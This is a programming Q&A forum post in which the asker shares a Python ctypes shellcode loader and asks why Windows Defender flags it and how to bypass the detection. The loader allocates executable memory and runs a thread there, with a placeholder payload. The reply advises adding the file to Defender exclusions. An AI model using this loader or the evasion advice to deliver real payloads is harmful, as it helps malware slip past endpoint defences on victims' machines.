0
import ctypes

shellcode = bytearray(b"SHELLCODE WAS HERE")
kernel32 = ctypes.windll.kernel32
# Declare pointer-sized return types: the ctypes default (c_int) truncates addresses and handles on 64-bit Python
kernel32.VirtualAlloc.restype = ctypes.c_void_p
kernel32.CreateThread.restype = ctypes.c_void_p

# MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40): one RWX region for the payload
ptr = kernel32.VirtualAlloc(ctypes.c_void_p(0), ctypes.c_size_t(len(shellcode)), ctypes.c_uint32(0x3000), ctypes.c_uint32(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
kernel32.RtlMoveMemory(ctypes.c_void_p(ptr), buf, ctypes.c_size_t(len(shellcode)))
# Start a thread at the buffer and block until it returns (INFINITE = 0xFFFFFFFF)
ht = kernel32.CreateThread(ctypes.c_void_p(0), ctypes.c_size_t(0), ctypes.c_void_p(ptr), ctypes.c_void_p(0), ctypes.c_uint32(0), ctypes.c_void_p(0))
kernel32.WaitForSingleObject(ctypes.c_void_p(ht), ctypes.c_uint32(0xFFFFFFFF))

This code places shellcode in memory and executes it. I understand that this is used in exploits, but my code doesn't exploit anything!

However, Windows Defender identifies the threat as "Exploit: Python / Leivion.A". Why is this happening, and how can the trigger be bypassed?

  • I want to add that I don't develop any malware. I don't like the fact that Windows Defender checks the file every time before I save it; it takes time and triggers a threat message. – Extrenz Arnautov Jul 30 '20 at 10:16
  • Ha, I actually just wrote some similar code (although mine is for process injection), and Defender flags it as well. Mine makes more sense because I'm creating a remote thread, which is a little sketchier. I wonder if it doesn't like the word "shellcode"? – Carcigenicate May 01 '21 at 15:18

1 Answer

-1

Windows Defender tends to mark every file that injects a .dll or .exe into a process as a virus or exploit. You can add your Python file to the exclusions in Windows Defender to solve this issue.

zeFree